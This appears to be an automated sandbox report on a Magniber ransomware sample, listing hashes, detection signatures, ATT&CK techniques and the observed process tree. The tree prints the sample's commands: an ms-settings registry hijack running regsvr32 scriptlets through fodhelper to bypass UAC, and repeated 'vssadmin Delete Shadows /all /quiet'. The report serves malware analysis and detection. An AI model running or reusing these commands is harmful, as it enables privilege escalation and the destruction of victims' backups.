magniber | 4d0c920b668f601929c25b6a0d26dd9cdc1714b264eed97d89426f04f065b3ac

Analysis

max time kernel
282s
max time network
296s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
24-03-2024 18:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

zp2428m.exe
Size

27KB
MD5

5ce57e2fbc4192b086dacc3cc4238e93
SHA1

ee2fcec7799eb0fe049c21ee66e5371fad9e2a1e
SHA256

fc00cde7fb4a752d4aded4c189dfae2388059bb7bae63794a3257f4aa95a803a
SHA512

2469cf5e016718ea395771dbae3160e36106bac70f5c7cad92872deccee2069aa101f647b922e973f68d28a54ddce7547ee9c52e402cb7e6cc74af334bb2530a
SSDEEP

384:dvPpOem2MDjDZNwxye01giAWGMhADD5cHUxH5gkyQH+hXzlovFZb7v/09w9d6b30:1pSfeViA5T8UU/YUze/Wwub3zg

Score

10^/10

magniber ransomware

Malware Config

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/2524-1-0x000002545C220000-0x000002545C223000-memory.dmp	family_magniber
behavioral1/memory/3372-0-0x000002076B040000-0x000002076B043000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Suspicious use of SetThreadContext 11 IoCs

description	pid	Process	procid_target
PID 3372 set thread context of 2524	3372	zp2428m.exe	42
PID 3372 set thread context of 2536	3372	zp2428m.exe	43
PID 3372 set thread context of 2936	3372	zp2428m.exe	52
PID 3372 set thread context of 3404	3372	zp2428m.exe	55
PID 3372 set thread context of 3684	3372	zp2428m.exe	56
PID 3372 set thread context of 3692	3372	zp2428m.exe	57
PID 3372 set thread context of 3920	3372	zp2428m.exe	58
PID 3372 set thread context of 2160	3372	zp2428m.exe	60
PID 3372 set thread context of 3396	3372	zp2428m.exe	67
PID 3372 set thread context of 4948	3372	zp2428m.exe	68
PID 3372 set thread context of 2240	3372	zp2428m.exe	69

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4183903823\810424605.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	fodhelper.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
3016	vssadmin.exe
3608	vssadmin.exe
4824	vssadmin.exe
4144	vssadmin.exe
3784	vssadmin.exe
4132	vssadmin.exe
2120	vssadmin.exe
3552	vssadmin.exe
2336	vssadmin.exe
1600	vssadmin.exe
544	vssadmin.exe
4956	vssadmin.exe
4560	vssadmin.exe
4992	vssadmin.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\ms-settings	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
3372	zp2428m.exe
3372	zp2428m.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3404	Explorer.EXE

Suspicious behavior: MapViewOfSection 11 IoCs

pid	Process
3372	zp2428m.exe
3372	zp2428m.exe
3372	zp2428m.exe
3372	zp2428m.exe
3372	zp2428m.exe
3372	zp2428m.exe
3372	zp2428m.exe
3372	zp2428m.exe
3372	zp2428m.exe
3372	zp2428m.exe
3372	zp2428m.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE
Token: SeShutdownPrivilege	3404	Explorer.EXE
Token: SeCreatePagefilePrivilege	3404	Explorer.EXE

Suspicious use of FindShellTrayWindow 50 IoCs

pid	Process
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
3404	Explorer.EXE
3404	Explorer.EXE
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
3404	Explorer.EXE
3404	Explorer.EXE

Suspicious use of SendNotifyMessage 47 IoCs

pid	Process
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
356	taskmgr.exe
3404	Explorer.EXE
3404	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2524 wrote to memory of 3608	2524	sihost.exe	73
PID 2524 wrote to memory of 3608	2524	sihost.exe	73
PID 2536 wrote to memory of 3664	2536	svchost.exe	74
PID 2536 wrote to memory of 3664	2536	svchost.exe	74
PID 2936 wrote to memory of 3412	2936	taskhostw.exe	75
PID 2936 wrote to memory of 3412	2936	taskhostw.exe	75
PID 3404 wrote to memory of 2164	3404	Explorer.EXE	76
PID 3404 wrote to memory of 2164	3404	Explorer.EXE	76
PID 3920 wrote to memory of 3260	3920	RuntimeBroker.exe	77
PID 3920 wrote to memory of 3260	3920	RuntimeBroker.exe	77
PID 3396 wrote to memory of 4336	3396	ApplicationFrameHost.exe	79
PID 3396 wrote to memory of 4336	3396	ApplicationFrameHost.exe	79
PID 4948 wrote to memory of 4400	4948	InstallAgent.exe	80
PID 4948 wrote to memory of 4400	4948	InstallAgent.exe	80
PID 3372 wrote to memory of 3316	3372	zp2428m.exe	81
PID 3372 wrote to memory of 3316	3372	zp2428m.exe	81
PID 3404 wrote to memory of 3340	3404	Explorer.EXE	84
PID 3404 wrote to memory of 3340	3404	Explorer.EXE	84
PID 2536 wrote to memory of 3788	2536	svchost.exe	86
PID 2536 wrote to memory of 3788	2536	svchost.exe	86
PID 2524 wrote to memory of 4608	2524	sihost.exe	88
PID 2524 wrote to memory of 4608	2524	sihost.exe	88
PID 2936 wrote to memory of 4636	2936	taskhostw.exe	90
PID 2936 wrote to memory of 4636	2936	taskhostw.exe	90
PID 3788 wrote to memory of 1644	3788	cmd.exe	92
PID 3788 wrote to memory of 1644	3788	cmd.exe	92
PID 3340 wrote to memory of 556	3340	cmd.exe	93
PID 3340 wrote to memory of 556	3340	cmd.exe	93
PID 4608 wrote to memory of 4848	4608	cmd.exe	94
PID 4608 wrote to memory of 4848	4608	cmd.exe	94
PID 4636 wrote to memory of 2812	4636	cmd.exe	95
PID 4636 wrote to memory of 2812	4636	cmd.exe	95
PID 3372 wrote to memory of 4212	3372	zp2428m.exe	96
PID 3372 wrote to memory of 4212	3372	zp2428m.exe	96
PID 3920 wrote to memory of 5100	3920	RuntimeBroker.exe	98
PID 3920 wrote to memory of 5100	3920	RuntimeBroker.exe	98
PID 3396 wrote to memory of 1616	3396	ApplicationFrameHost.exe	100
PID 3396 wrote to memory of 1616	3396	ApplicationFrameHost.exe	100
PID 4948 wrote to memory of 3004	4948	InstallAgent.exe	101
PID 4948 wrote to memory of 3004	4948	InstallAgent.exe	101
PID 5100 wrote to memory of 4404	5100	cmd.exe	105
PID 5100 wrote to memory of 4404	5100	cmd.exe	105
PID 4212 wrote to memory of 2576	4212	cmd.exe	106
PID 4212 wrote to memory of 2576	4212	cmd.exe	106
PID 1616 wrote to memory of 828	1616	cmd.exe	107
PID 1616 wrote to memory of 828	1616	cmd.exe	107
PID 3004 wrote to memory of 192	3004	cmd.exe	108
PID 3004 wrote to memory of 192	3004	cmd.exe	108
PID 2812 wrote to memory of 1696	2812	fodhelper.exe	109
PID 2812 wrote to memory of 1696	2812	fodhelper.exe	109
PID 4848 wrote to memory of 3056	4848	fodhelper.exe	111
PID 4848 wrote to memory of 3056	4848	fodhelper.exe	111
PID 2576 wrote to memory of 832	2576	fodhelper.exe	112
PID 2576 wrote to memory of 832	2576	fodhelper.exe	112
PID 4404 wrote to memory of 3052	4404	fodhelper.exe	114
PID 4404 wrote to memory of 3052	4404	fodhelper.exe	114
PID 828 wrote to memory of 1640	828	fodhelper.exe	113
PID 828 wrote to memory of 1640	828	fodhelper.exe	113
PID 192 wrote to memory of 4752	192	fodhelper.exe	115
PID 192 wrote to memory of 4752	192	fodhelper.exe	115
PID 556 wrote to memory of 4528	556	fodhelper.exe	116
PID 556 wrote to memory of 4528	556	fodhelper.exe	116
PID 1644 wrote to memory of 1908	1644	fodhelper.exe	110
PID 1644 wrote to memory of 1908	1644	fodhelper.exe	110

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:2524
- \??\c:\windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/o703w31o
  2⤵
  - Modifies registry class
  PID:3608
- \??\c:\windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4608
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:4848
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:3056
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:3552
- \??\c:\windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1216
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:1604
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:3336
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:3608

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2536
- \??\c:\windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/o703w31o
  2⤵
  - Modifies registry class
  PID:3664
- \??\c:\windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3788
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1644
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:1908
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:3784
- \??\c:\windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:2588
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:1188
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:4736
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4132

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2936
- \??\c:\windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/o703w31o
  2⤵
  - Modifies registry class
  PID:3412
- \??\c:\windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4636
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2812
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:1696
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4992
- \??\c:\windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:2036
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:1872
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:4504
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:544

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3404
- C:\Users\Admin\AppData\Local\Temp\zp2428m.exe
  "C:\Users\Admin\AppData\Local\Temp\zp2428m.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3372
- - C:\Windows\SYSTEM32\regsvr32.exe
    regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/o703w31o
    3⤵
    PID:3316
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c "start fodhelper.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4212
  - - C:\Windows\system32\fodhelper.exe
      fodhelper.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2576
    - - C:\Windows\system32\regsvr32.exe
        
        "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
        5⤵
        
        PID:832
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c "start fodhelper.exe"
    3⤵
    PID:3960
  - - C:\Windows\system32\fodhelper.exe
      fodhelper.exe
      4⤵
      PID:1792
    - - C:\Windows\system32\regsvr32.exe
        
        "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
        5⤵
        
        PID:4400
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/o703w31o
  2⤵
  - Modifies registry class
  PID:2164
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3340
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:556
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:4528
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:3016
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4952
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:3036
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:4264
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:1600
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:356

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:3684

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:3692

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3920
- C:\Windows\System32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/o703w31o
  2⤵
  - Modifies registry class
  PID:3260
- C:\Windows\System32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5100
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4404
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:3052
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4144
- C:\Windows\System32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:856
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:2404
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:4508
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4956

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2160

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3396
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/o703w31o
  2⤵
  - Modifies registry class
  PID:4336
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:828
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:1640
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4560
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1644
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:232
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ed0v2w6x8gqo
      4⤵
      PID:4808
